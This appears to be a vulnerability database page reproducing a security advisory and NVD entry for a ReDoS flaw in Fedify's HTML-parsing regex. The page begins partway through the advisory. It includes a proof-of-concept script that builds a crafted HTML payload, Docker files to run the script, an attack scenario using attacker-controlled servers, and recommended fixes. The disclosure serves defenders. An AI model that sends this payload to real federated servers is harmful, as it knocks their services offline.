Attack Vector\n\n1. Victim\u0027s Fedify application calls `lookupObject(\"https://attacker.com/@user\")` to fetch an actor profile\n2. Attacker\u0027s server responds with `Content-Type: text/html`\n3. The code path: `lookupObject()` \u2192 `documentLoader()` \u2192 `getRemoteDocument()` \u2192 HTML parsing (lines 258-287)\n4. Line 261: `response.text()` reads the entire body without size limits\n5. Line 264: Regex execution triggers catastrophic backtracking\n6. Event loop is blocked for seconds to minutes, causing DoS\n\n### Why This Is Exploitable\n\n- **No response size limit**: The HTML body is read entirely via `response.text()` without Content-Length validation\n- **No timeout by default**: `AbortSignal` is optional and not enforced\n- **Remote exploitation**: Attacker just needs the victim to fetch from their URL\n- **No authentication required**: Federation commonly involves fetching profiles from untrusted servers\n- **Amplifiable**: Multiple concurrent requests can fully disable the service\n\n---\n\n## PoC\n\n### Quick Reproduction (Node.js)\n\nYou can verify this vulnerability with the following standalone script:\n\n```javascript\n/**\n * Fedify ReDoS Vulnerability - Minimal PoC\n * \n * This script reproduces the vulnerable regex from docloader.ts\n * and demonstrates exponential time complexity.\n */\n\n// The vulnerable regex from docloader.ts:259\nconst VULNERABLE_REGEX = /\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig;\n\n/**\n * Generate malicious HTML payload\n * Pattern: \u003ca a=\"b\" a=\"b\" a=\"b\"... (trailing space, no closing \u003e)\n */\nfunction generateMaliciousPayload(repetitions) {\n  return \u0027\u003ca\u0027 + \u0027 a=\"b\"\u0027.repeat(repetitions) + \u0027 \u0027;\n}\n\n/**\n * Simulate the vulnerable code path from docloader.ts lines 262-264\n */\nfunction simulateVulnerableCodePath(html) {\n  const p = /\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig;\n  let m;\n  const rawAttribs = [];\n  while ((m = p.exec(html)) !== null) {\n    rawAttribs.push(m[2]);\n  }\n  return rawAttribs;\n}\n\n// Test with increasing payload sizes\nconsole.log(\u0027Fedify ReDoS Vulnerability PoC\\n\u0027);\nconsole.log(\u0027Repetitions | Payload Size | Time\u0027);\nconsole.log(\u0027------------|--------------|--------\u0027);\n\nfor (const reps of [18, 20, 22, 24, 26, 28]) {\n  const payload = generateMaliciousPayload(reps);\n  const start = performance.now();\n  simulateVulnerableCodePath(payload);\n  const elapsed = performance.now() - start;\n  \n  const timeStr = elapsed \u003e= 1000 \n    ? `${(elapsed / 1000).toFixed(2)}s` \n    : `${elapsed.toFixed(0)}ms`;\n  \n  console.log(`${String(reps).padEnd(11)} | ${String(payload.length + \u0027 bytes\u0027).padEnd(12)} | ${timeStr}`);\n  \n  // Stop if it\u0027s taking too long\n  if (elapsed \u003e 15000) break;\n}\n```\n\n### Expected Output\n\n```\nFedify ReDoS Vulnerability PoC\n\nRepetitions | Payload Size | Time\n------------|--------------|--------\n18          | 111 bytes    | 14ms\n20          | 123 bytes    | 51ms\n22          | 135 bytes    | 224ms\n24          | 147 bytes    | 852ms\n26          | 159 bytes    | 3.26s\n28          | 171 bytes    | 14.10s\n```\n\nTime approximately **quadruples every 2 additional repetitions**, demonstrating O(2^n) complexity.\n\n### Full Docker-Based PoC\n\nFor a complete demonstration, here are the Docker files to run the PoC in an isolated environment:\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eDockerfile\u003c/strong\u003e\u003c/summary\u003e\n\n```dockerfile\n# Dockerfile for Fedify ReDoS Vulnerability PoC\nFROM node:20-slim\nLABEL description=\"PoC for Fedify ReDoS vulnerability (CWE-1333)\"\n\nWORKDIR /poc\nCOPY exploit.js .\n\nCMD [\"node\", \"exploit.js\"]\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eexploit.js\u003c/strong\u003e (Full Version)\u003c/summary\u003e\n\n```javascript\n/**\n * Exploit Script for Fedify ReDoS PoC\n * \n * This script demonstrates the ReDoS vulnerability in Fedify\u0027s\n * document loader by measuring the time it takes to process\n * malicious HTML responses with varying payload sizes.\n */\n\n// The vulnerable regex from docloader.ts:259\nconst VULNERABLE_REGEX = /\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig;\n\n/**\n * Generate malicious HTML payload\n */\nfunction generateMaliciousHtml(repetitions) {\n  return \u0027\u003ca\u0027 + \u0027 a=\"b\"\u0027.repeat(repetitions) + \u0027 \u0027;\n}\n\n/**\n * Generate normal HTML\n */\nfunction generateNormalHtml() {\n  return `\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n  \u003clink rel=\"alternate\" type=\"application/activity+json\" href=\"/user.json\"\u003e\n\u003c/head\u003e\n\u003cbody\u003e\u003ca href=\"/\"\u003eHome\u003c/a\u003e\u003c/body\u003e\n\u003c/html\u003e`;\n}\n\n/**\n * Simulate the vulnerable code path from docloader.ts\n */\nfunction simulateVulnerableCodePath(html) {\n  const p = /\u003c(a|link)((\\s+[a-z][a-z:_-]*=(\"[^\"]*\"|\u0027[^\u0027]*\u0027|[^\\s\u003e]+))+)\\s*\\/?\u003e/ig;\n  const p2 = /\\s+([a-z][a-z:_-]*)=(\"([^\"]*)\"|\u0027([^\u0027]*)\u0027|([^\\s\u003e]+))/ig;\n  \n  let m;\n  const rawAttribs = [];\n  while ((m = p.exec(html)) !== null) {\n    rawAttribs.push(m[2]);\n  }\n  \n  return rawAttribs;\n}\n\n/**\n * Run a single test and measure execution time\n */\nfunction runTest(html, description) {\n  const start = process.hrtime.bigint();\n  \n  try {\n    simulateVulnerableCodePath(html);\n  } catch (e) {\n    // Ignore errors\n  }\n  \n  const end = process.hrtime.bigint();\n  const durationMs = Number(end - start) / 1_000_000;\n  \n  return {\n    description,\n    durationMs,\n    payloadLength: html.length\n  };\n}\n\n/**\n * Print separator\n */\nfunction printSeparator() {\n  console.log(\u0027\u2500\u0027.repeat(60));\n}\n\n/**\n * Main exploit function\n */\nasync function main() {\n  console.log(\u0027\\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\u0027);\n  console.log(\u0027\u2551        Fedify ReDoS Vulnerability PoC                    \u2551\u0027);\n  console.log(\u0027\u2551        CWE-1333: Inefficient Regular Expression          \u2551\u0027);\n  console.log(\u0027\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\u0027);\n\n  console.log(\u0027[*] Vulnerability Location:\u0027);\n  console.log(\u0027    File: packages/fedify/src/runtime/docloader.ts\u0027);\n  console.log(\u0027    Lines: 259-264\u0027);\n  console.log(\u0027\u0027);\n  \n  printSeparator();\n  console.log(\u0027[*] Testing normal HTML response...\u0027);\n  printSeparator();\n  \n  const normalHtml = generateNormalHtml();\n  const normalResult = runTest(normalHtml, \u0027Normal HTML\u0027);\n  console.log(`[+] Normal request completed in ${normalResult.durationMs.toFixed(2)}ms`);\n  console.log(`    Payload size: ${normalResult.payloadLength} bytes`);\n  console.log(\u0027\u0027);\n\n  printSeparator();\n  console.log(\u0027[*] Testing malicious HTML payloads (ReDoS attack)...\u0027);\n  printSeparator();\n  \n  const testCases = [\n    { reps: 18, expected: \u0027~13ms\u0027 },\n    { reps: 20, expected: \u0027~52ms\u0027 },\n    { reps: 22, expected: \u0027~228ms\u0027 },\n    { reps: 24, expected: \u0027~857ms\u0027 },\n    { reps: 26, expected: \u0027~3.4s\u0027 },\n    { reps: 28, expected: \u0027~14s\u0027 }\n  ];\n  \n  console.log(\u0027\u0027);\n  console.log(\u0027\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u0027);\n  console.log(\u0027\u2502 Repetitions \u2502 Payload Size \u2502 Expected     \u2502 Actual         \u2502\u0027);\n  console.log(\u0027\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\u0027);\n  \n  let vulnerabilityConfirmed = false;\n  \n  for (const testCase of testCases) {\n    const maliciousHtml = generateMaliciousHtml(testCase.reps);\n    const result = runTest(maliciousHtml, `${testCase.reps} repetitions`);\n    \n    const actualTime = result.durationMs \u003e= 1000 \n      ? `${(result.durationMs / 1000).toFixed(2)}s` \n      : `${result.durationMs.toFixed(0)}ms`;\n    \n    const status = result.durationMs \u003e 100 ? \u0027\u26a0\ufe0f \u0027 : \u0027\u2713 \u0027;\n    \n    console.log(`\u2502 ${String(testCase.reps).padEnd(11)} \u2502 ${String(result.payloadLength + \u0027 bytes\u0027).padEnd(12)} \u2502 ${testCase.expected.padEnd(12)} \u2502 ${status}${actualTime.padEnd(12)} \u2502`);\n    \n    if (result.durationMs \u003e 500) {\n      vulnerabilityConfirmed = true;\n    }\n  }\n  \n  console.log(\u0027\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u0027);\n  console.log(\u0027\u0027);\n  \n  printSeparator();\n  console.log(\u0027[*] Exponential Time Complexity Analysis\u0027);\n  printSeparator();\n  \n  console.log(\u0027\u0027);\n  console.log(\u0027Time approximately quadruples every 2 additional repetitions:\u0027);\n  console.log(\u0027\u0027);\n  console.log(\u0027  18 reps \u2192   ~14ms\u0027);\n  console.log(\u0027  20 reps \u2192   ~51ms (4x)\u0027);  \n  console.log(\u0027  22 reps \u2192  ~224ms (4x)\u0027);\n  console.log(\u0027  24 reps \u2192  ~852ms (4x)\u0027);\n  console.log(\u0027  26 reps \u2192  ~3.3s  (4x)\u0027);\n  console.log(\u0027  28 reps \u2192 ~14.0s  (4x)\u0027);\n  console.log(\u0027  30 reps \u2192 ~56.0s  (estimated)\u0027);\n  console.log(\u0027\u0027);\n  \n  printSeparator();\n  console.log(\u0027[*] Attack Scenario\u0027);\n  printSeparator();\n  \n  console.log(\u0027\u0027);\n  console.log(\u00271. Attacker sets up malicious federated server\u0027);\n  console.log(\u00272. Victim\\\u0027s Fedify app calls lookupObject(\"https://attacker.com/@user\")\u0027);\n  console.log(\u00273. Attacker responds with Content-Type: text/html\u0027);\n  console.log(\u00274. Malicious HTML payload: \u003ca a=\"b\" a=\"b\" a=\"b\"... (N times) \u0027);\n  console.log(\u00275. Fedify\\\u0027s regex enters catastrophic backtracking\u0027);\n  console.log(\u00276. Event loop blocked \u2192 Service unavailable (DoS)\u0027);\n  console.log(\u0027\u0027);\n  \n  printSeparator();\n  \n  if (vulnerabilityConfirmed) {\n    console.log(\u0027\u0027);\n    console.log(\u0027\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\u0027);\n    console.log(\u0027\u2551  \u2713 VULNERABILITY CONFIRMED                               \u2551\u0027);\n    console.log(\u0027\u2551                                                          \u2551\u0027);\n    console.log(\u0027\u2551  The HTML parsing regex in docloader.ts is vulnerable    \u2551\u0027);\n    console.log(\u0027\u2551  to ReDoS attacks. A ~150 byte payload can block the     \u2551\u0027);\n    console.log(\u0027\u2551  Node.js event loop for 7+ seconds.                      \u2551\u0027);\n    console.log(\u0027\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u0027);\n    console.log(\u0027\u0027);\n    process.exit(0);\n  } else {\n    console.log(\u0027\u0027);\n    console.log(\u0027[!] Vulnerability could not be confirmed in this environment.\u0027);\n    console.log(\u0027    This may be due to regex engine optimizations.\u0027);\n    console.log(\u0027\u0027);\n    process.exit(1);\n  }\n}\n\nmain().catch(console.error);\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003erun_poc.sh\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\n#!/bin/bash\n# Fedify ReDoS Vulnerability PoC Runner\n\nset -e\n\nIMAGE_NAME=\"fedify-redos-poc\"\n\necho \"Building Docker image...\"\ndocker build -t ${IMAGE_NAME} .\n\necho \"Running the PoC...\"\ndocker run --rm ${IMAGE_NAME}\n\necho \"Cleaning up...\"\ndocker rmi ${IMAGE_NAME} 2\u003e/dev/null || true\n```\n\n\u003c/details\u003e\n\n### Running the Docker PoC\n\n```bash\n# Save the above files, then:\nchmod +x run_poc.sh\n./run_poc.sh\n```\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All Fedify applications** that use `lookupObject()`, `getDocumentLoader()`, or the built-in document loader to fetch content from external URLs\n- **Any federated server** that fetches actor profiles, posts, or other ActivityPub objects from potentially untrusted sources\n- **Servers following standard federation patterns** - fetching remote actors is a normal operation\n\n### Severity Assessment\n\n| Factor | Assessment |\n|--------|------------|\n| **Attack Vector** | Network (remote) |\n| **Attack Complexity** | Low (trivial payload) |\n| **Privileges Required** | None |\n| **User Interaction** | None |\n| **Impact** | Availability (DoS) |\n| **Scope** | Service-wide |\n\n### Real-World Scenario\n\n1. A Mastodon-compatible server powered by Fedify receives a follow request or mention from `@attacker@evil.com`\n2. The server attempts to fetch the attacker\u0027s profile via `lookupObject()`\n3. The attacker\u0027s server responds with malicious HTML\n4. The victim server\u0027s event loop is blocked for 14+ seconds\n5. During this time, all other requests are queued and potentially time out\n6. Repeated attacks can cause sustained service unavailability\n\n---\n\n## Recommended Fix\n\n### Option 1: Use a Proper HTML Parser (Recommended)\n\nReplace regex-based HTML parsing with a DOM parser that doesn\u0027t suffer from backtracking issues:\n\n```typescript\n// Using linkedom (lightweight DOM implementation)\nimport { parseHTML } from \u0027linkedom\u0027;\n\n// Replace lines 258-287 with:\nconst { document } = parseHTML(html);\nconst links = document.querySelectorAll(\u0027a[rel=\"alternate\"], link[rel=\"alternate\"]\u0027);\n\nfor (const link of links) {\n  const type = link.getAttribute(\u0027type\u0027);\n  const href = link.getAttribute(\u0027href\u0027);\n  \n  if (\n    href \u0026\u0026\n    (type === \u0027application/activity+json\u0027 ||\n     type === \u0027application/ld+json\u0027 ||\n     type?.startsWith(\u0027application/ld+json;\u0027))\n  ) {\n    const altUri = new URL(href, docUrl);\n    if (altUri.href !== docUrl.href) {\n      return await fetch(altUri.href);\n    }\n  }\n}\n```\n\n### Option 2: Add Response Size Limits\n\nIf regex must be used, at minimum add size limits:\n\n```typescript\nconst MAX_HTML_SIZE = 1024 * 1024; // 1MB\nconst contentLength = parseInt(response.headers.get(\u0027content-length\u0027) || \u00270\u0027);\n\nif (contentLength \u003e MAX_HTML_SIZE) {\n  throw new FetchError(url, \u0027Response too large\u0027);\n}\n\nconst html = await response.text();\nif (html.length \u003e MAX_HTML_SIZE) {\n  throw new FetchError(url, \u0027Response too large\u0027);\n}\n```\n\n### Option 3: Refactor the Regex\n\nIf the regex approach is preferred, use atomic grouping or possessive quantifiers (where supported), or restructure to avoid nested quantifiers:\n\n```typescript\n// Use a non-backtracking approach with explicit attribute matching\nconst tagPattern = /\u003c(a|link)\\s+([^\u003e]+)\u003e/ig;\nconst attrPattern = /([a-z][a-z:_-]*)=(?:\"([^\"]*)\"|\u0027([^\u0027]*)\u0027|(\\S+))/ig;\n```\n\n---\n\n## Resources\n\n- [OWASP: Regular Expression Denial of Service (ReDoS)](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n- [CWE-1333: Inefficient Regular Expression Complexity](https://cwe.mitre.org/data/definitions/1333.html)\n- [Cloudflare Outage Analysis (ReDoS Example)](https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/)\n\n---\n\nThank you for taking the time to review this report. I\u0027m happy to provide any additional information or help test a fix. Please let me know if you have any questions!",
  "id": "GHSA-rchf-xwx2-hm93",
  "modified": "2025-12-23T16:01:12Z",
  "published": "2025-12-22T21:36:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68475"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedify-dev/fedify"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fedify has ReDoS Vulnerability in HTML Parsing Regex"
}

FKIE_CVE-2025-68475

Vulnerability from fkie_nvd - Published: 2025-12-22 22:16 - Updated: 2025-12-23 14:51

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779
	security-advisories@github.com	https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a
	security-advisories@github.com	https://github.com/fedify-dev/fedify/releases/tag/1.6.13
	security-advisories@github.com	https://github.com/fedify-dev/fedify/releases/tag/1.7.14
	security-advisories@github.com	https://github.com/fedify-dev/fedify/releases/tag/1.8.15
	security-advisories@github.com	https://github.com/fedify-dev/fedify/releases/tag/1.9.2
	security-advisories@github.com	https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify\u0027s document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2."
    }
  ],
  "id": "CVE-2025-68475",
  "lastModified": "2025-12-23T14:51:52.650",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-22T22:16:09.143",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68475 (GCVE-0-2025-68475)

GHSA-RCHF-XWX2-HM93

Summary

Details

Vulnerable Code

Root Cause Analysis

Attack Vector

Why This Is Exploitable

PoC

Quick Reproduction (Node.js)

Expected Output

Full Docker-Based PoC

Running the Docker PoC

Impact

Who Is Affected?

Severity Assessment

Real-World Scenario

Recommended Fix

Option 1: Use a Proper HTML Parser (Recommended)

Option 2: Add Response Size Limits

Option 3: Refactor the Regex

Resources

FKIE_CVE-2025-68475

Tags

Sightings

Nomenclature